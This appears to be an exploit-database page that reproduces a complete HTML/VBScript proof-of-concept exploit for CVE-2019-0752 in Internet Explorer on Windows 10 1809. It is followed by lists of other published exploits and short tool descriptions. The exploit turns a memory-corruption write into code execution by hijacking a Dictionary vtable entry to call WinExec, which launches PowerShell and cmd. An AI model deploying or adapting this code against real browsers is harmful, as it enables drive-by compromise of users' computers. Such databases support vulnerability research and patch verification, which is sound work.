Search for hundreds of thousands of exploits

"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption"

Author

Exploit author

"Simon Zuckerbraun"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-05-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
<!-- all the way to RCE using no shellcode.                                                     -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
<!--    (h/t: James Forshaw, Google Project Zero)                                               -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
	<div id="container1" style="overflow:scroll; width: 10px">
		<div id="content1" style="width:5000000px">
			Content
		</div>
	</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
	Private mValue
	Public Property Let Value(v)
		mValue = v
	End Property
	Public Default Property Get P
		P = mValue				' Where to write
	End Property
End Class
Sub TriggerWrite(where, val)
	Dim v1
	Set v1 = document.getElementById("container1")
	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
	Dim c
	Set c = new MyClass
	c.Value = where
	Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
	TriggerWrite addr    , (val) AND &hff
	TriggerWrite addr + 1, (val\&h100) AND &hff
	TriggerWrite addr + 2, (val\&h10000) AND &hff
	TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
	For i = 0 To Len(str) - 1
		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
	Next
End Sub
Function ReadInt32(addr)
	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
	ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
	Set ar1(gremlin + 1) = obj
	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
	' Corrupt vt of one array element (the "gremlin")
	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
		If Not IsEmpty(ar1(i)) Then
			gremlin = i
			Exit For
		End If
	Next
	
	If IsEmpty(gremlin) Then
		MsgBox "Could not find gremlin"
		Exit Sub
	End If
	
	For i = 0 To UBound(ar2)
		Set ar2(i) = CreateObject("Scripting.Dictionary")
	Next
	
	Set dict = ar2(UBound(ar2) / 2)
	addressOfDict = LeakAddressOfObject(dict)
	vtableOfDict = ReadInt32(addressOfDict)
	scrrun = vtableOfDict - &h11fc
	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
	winExec = kernel32 + &h5d380
	
	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
	' Relocate pld to ensure its address doesn't contain a null byte
	pld = ReadInt32(addressOfDict + &h3c)
	fakePld = &h28281020
	For i = 0 To 3 - 1
		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
	Next
	
	fakeVtable = &h28282828		' ASCII "(((("
	For i = 0 To 21
		If i = 12 Then		' Dictionary.Exists
			fptr = winExec
		Else
			fptr = ReadInt32(vtableOfDict + 4 * i)
		End If
		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
	Next
	
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
	
	On Error Resume Next
	dict.Exists "dummy"		' Wheeee!!
	
	' A little cleanup to help prevent crashes after the exploit
	For i = 1 To 3
		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
	Next
	Erase Dict
	Erase ar2
End Sub
Exploit
</script>
</body>
</html>
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2019-05-24"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption"remotewindows"Simon Zuckerbraun"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46928/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.